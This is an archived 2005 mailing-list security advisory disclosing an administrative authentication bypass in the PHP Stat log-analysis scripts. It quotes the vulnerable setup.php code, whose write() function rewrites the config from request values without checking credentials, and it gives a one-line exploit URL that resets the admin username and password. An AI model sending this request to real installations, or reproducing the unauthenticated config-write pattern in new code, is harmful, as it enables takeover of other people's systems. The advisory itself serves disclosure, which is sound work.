lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 27 May 2005 01:45:03 -0300
From: SoulBlack Group <soulblacktm@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	news@...uriteam.com, sec@...lblack.com.ar, bugs@...uritytracker.com,
	submissions@...ketstormsecurity.org, vuln@...unia.com,
	alerts_advisories@...-security.org
Subject: PHP Stat Administrative User Authentication Bypass


===========================================================

============================================================
Title: PHP Stat
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 25/05/2005
Severity: Medium. PHP Stat Administrative User Authentication Bypass
Affected version: unkown
vendor: http://phpstat.sourceforge.net/journal/
============================================================

============================================================

* Summary *

PhpStat is a set of PHP scripts that can analyze, sort, and generate
statistics on IM
log files from different clients and store the data in a database. It
also allows for
users to read their own logs.

-------------------------------------------------------------

* Problem Description *

The bug reside in $check var in setup.php.

Vulnerable Code

include("config.php");
include("$path_data/setup.php");
$check = $_REQUEST['check'];
$pass = $_REQUEST['pass'];
$user = $_REQUEST['user'];
if ($check == "admin" && $pass == $password && $user == $username) {
showsetup();
} elseif (($check == "admin") && ($pass != $password || $user != $username)) {
adminerror();
} elseif ($check == "yes") {
write($_REQUEST);
} else {
admin();


/*

when it sends a "yes" in setup.php this call to the function "write()"

*/

function write($_REQUEST) {
include("config.php");
 .
 .
 .
 .
 $admin = strtolower($_REQUEST['admin']);
 $username = strtolower($_REQUEST['username']);
 $password = strtolower($_REQUEST['password']);
 $fp = fopen("$path_data/setup.php", "wb") or die ("The File
\"$path_data/setup.php\" does not exist");
 flock( $fp, 2);
 fputs ($fp, "<?php\n\$show = \"$show\";\n\$refshow =
\"$refshow\";\n\$ldec = \"$ldec\";\n\$lcolor = \"$lcolor\";\n\$hcolor
= \"$hcolor\";\n\$font_family = \"$font_family\";\n\$font_size =
\"$font_size\";\n\$color = \"$color\";\n\$font_style =
\"$font_style\";\n\$font_weight = \"$font_weight\";\n\$letter_spacing
= \"$letter_spacing\";\n\$admin = \"$admin\";\n\$username =
\"$username\";\n\$password = \"$password\";\n?>");
 flock( $fp, 1);
 fclose ($fp);


where we you see

 setup.php?check=yes&username=admin&password=admin


-------------------------------------------------------------

* POC *

http://www.soulblack.com.ar/repo/tools/sbphpstatpoc.txt

-------------------------------------------------------------

* Fix *

  Use .htaccess or contact Vendor.

-------------------------------------------------------------

* References *

http://www.soulblack.com.ar/repo/papers/advisory/PhpStat_advisory.txt

-------------------------------------------------------------

* Credits *

Vulnerability reported by SoulBlack Security Research

============================================================

--
SoulBlack - Security Research
http://www.soulblack.com.ar


Powered by blists - more mailing lists